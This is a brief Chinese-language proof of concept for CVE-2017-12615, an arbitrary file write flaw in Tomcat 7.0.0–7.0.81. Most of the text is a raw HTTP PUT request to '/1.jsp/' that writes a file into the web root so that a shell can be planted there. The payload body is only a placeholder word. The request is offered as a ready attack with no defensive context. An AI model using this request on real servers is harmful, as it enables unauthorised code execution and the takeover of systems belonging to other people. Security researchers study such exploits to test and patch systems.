CVE-2017-12615 tomcat任意文件写入

影响范围：Tomcat 7.0.0-7.0.81

POC

直接构造数据包，将shell写入web根目录

PUT /1.jsp/ HTTP/1.1
Host: your-ip:8080
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 5

shell